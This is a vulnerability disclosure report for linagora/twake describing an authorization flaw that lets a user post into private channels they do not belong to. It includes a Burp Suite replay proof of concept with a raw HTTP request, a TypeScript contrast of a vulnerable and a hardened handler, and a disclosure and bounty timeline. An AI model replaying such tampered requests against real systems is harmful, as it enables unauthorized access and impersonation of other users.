Send any message to any private channel in linagora/twake
Valid
Reported on
Jan 1st 2023
Description
A user can post a message to a private channel they are not a member of. The web application did not check whether the sending user's id belongs to the membership of the target private channel before accepting the message.
Proof of Concept
Log in to the website in browser 1 as user A.
Log in to the website in browser 2 as user B.
In browser 1, user A creates a private channel (user B is not a member). In browser 2, user B sends a message to any channel and captures the request with Burp Suite.
Take the id of user A's private channel and substitute it for the channel id in user B's captured send-message request in Burp Suite, then replay the request:
POST /internal/services/messages/v1/companies/9060b950-89b4-11ed-902d-338d3eb6e868/threads HTTP/1.1

{
  "resource": {
    "participants": [
      {
        "type": "channel",
        "id": "ddd58469-9c1a-4548-ba28-5ad057522f7f",
        "company_id": "9060b950-89b4-11ed-902d-338d3eb6e868",
        "workspace_id": "9072bab0-89b4-11ed-902d-338d3eb6e868"
      }
    ]
  },
  "options": {
    "message": {
      "thread_id": "59c0d1b0-89b8-11ed-81da-e96b2398db85",
      "created_at": 1672566039115,
      "user_id": "eee929d0-89b4-11ed-902d-338d3eb6e868",
      "context": { "_front_id": "59c0d1b1-89b8-11ed-81da-e96b2398db85" },
      "text": "This is message private",
      "files": []
    }
  }
}
Demo: https://drive.google.com/file/d/1eDipnxCFUm6JUtJJHBo8AYM1ofNSnblN/view
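The missing authorization check, as an added TypeScript example that is not Twake's code and does not reproduce its fix. It models the thread-creation endpoint from the proof of concept with a vulnerable handler beside a hardened one; the hardened one resolves the author from the authenticated session rather than from the user_id field carried in the request body, and refuses to write into a private channel the session user is not a member of. The channel, user and company identifiers, the handler signatures and the in-memory store are all assumptions made for the example.

```typescript
// Added example (not Twake's code): a minimal model of the membership check
// that the thread-creation endpoint was missing. All identifiers are made up.

type Visibility = "public" | "private";

interface Channel {
  id: string;
  companyId: string;
  workspaceId: string;
  visibility: Visibility;
  members: Set<string>; // user ids allowed to read and post
}

interface Participant {
  type: "channel";
  id: string;
  company_id: string;
  workspace_id: string;
}

// Trimmed shape of the request body shown in the proof of concept.
interface ThreadRequest {
  resource: { participants: Participant[] };
  options: { message: { text: string; user_id?: string } };
}

interface Thread {
  channelId: string;
  authorId: string;
  text: string;
}

class ForbiddenError extends Error {}

class ChannelStore {
  private channels = new Map<string, Channel>();
  add(ch: Channel): void { this.channels.set(ch.id, ch); }
  get(id: string): Channel | undefined { return this.channels.get(id); }
}

// Vulnerable handler: looks the channel up by the id in the body and takes the
// author from the body too, so any authenticated user who learns a private
// channel id can post into it.
function createThreadVulnerable(store: ChannelStore, req: ThreadRequest): Thread[] {
  const author = req.options.message.user_id ?? "unknown";
  return req.resource.participants.map((p) => {
    const ch = store.get(p.id);
    if (!ch) throw new Error(`unknown channel ${p.id}`);
    return { channelId: ch.id, authorId: author, text: req.options.message.text };
  });
}

// Hardened handler: the author is the session user (the body's user_id is
// ignored), the channel must belong to the company in the URL and the
// workspace in the body, and private channels require membership.
function createThreadChecked(
  store: ChannelStore,
  sessionUserId: string,
  urlCompanyId: string,
  req: ThreadRequest,
): Thread[] {
  return req.resource.participants.map((p) => {
    const ch = store.get(p.id);
    // One generic error for unknown, mis-scoped and forbidden channels so the
    // endpoint cannot be used to confirm which private channel ids exist.
    const scoped = ch !== undefined
      && ch.companyId === urlCompanyId
      && ch.companyId === p.company_id
      && ch.workspaceId === p.workspace_id;
    if (!scoped) throw new ForbiddenError("channel not accessible");
    if (ch!.visibility === "private" && !ch!.members.has(sessionUserId)) {
      throw new ForbiddenError("channel not accessible");
    }
    return { channelId: ch!.id, authorId: sessionUserId, text: req.options.message.text };
  });
}

// Constructed fixture mirroring the PoC: user A owns a private channel that
// user B is not a member of, plus a public channel both can use.
function demoStore(): ChannelStore {
  const store = new ChannelStore();
  store.add({ id: "chan-private-a", companyId: "company-1", workspaceId: "ws-1",
    visibility: "private", members: new Set(["user-a"]) });
  store.add({ id: "chan-general", companyId: "company-1", workspaceId: "ws-1",
    visibility: "public", members: new Set(["user-a", "user-b"]) });
  return store;
}

// Constructed request in the shape of the captured one, with the channel id
// swapped the way the PoC does it.
function demoRequest(channelId: string, bodyUserId: string): ThreadRequest {
  return {
    resource: { participants: [{ type: "channel", id: channelId,
      company_id: "company-1", workspace_id: "ws-1" }] },
    options: { message: { text: "This is message private", user_id: bodyUserId } },
  };
}
```

Replaying user B's request against the vulnerable handler with user A's private channel id succeeds; the hardened handler rejects it with ForbiddenError, still lets user A post, and records user A as the author even when the body names someone else.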
Impact
A user can send any message to any private channel they are not a member of.
We are processing your report and will contact the linagora/twake team within 24 hours.
8 days ago
We have contacted a member of the linagora/twake team and are waiting to hear back
7 days ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Thanks, we are working on a fix today
Kevin Kien has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Romaric Mourgues has been awarded the fix bounty
This vulnerability will not receive a CVE
This vulnerability is scheduled to go public on Jan 7th 2023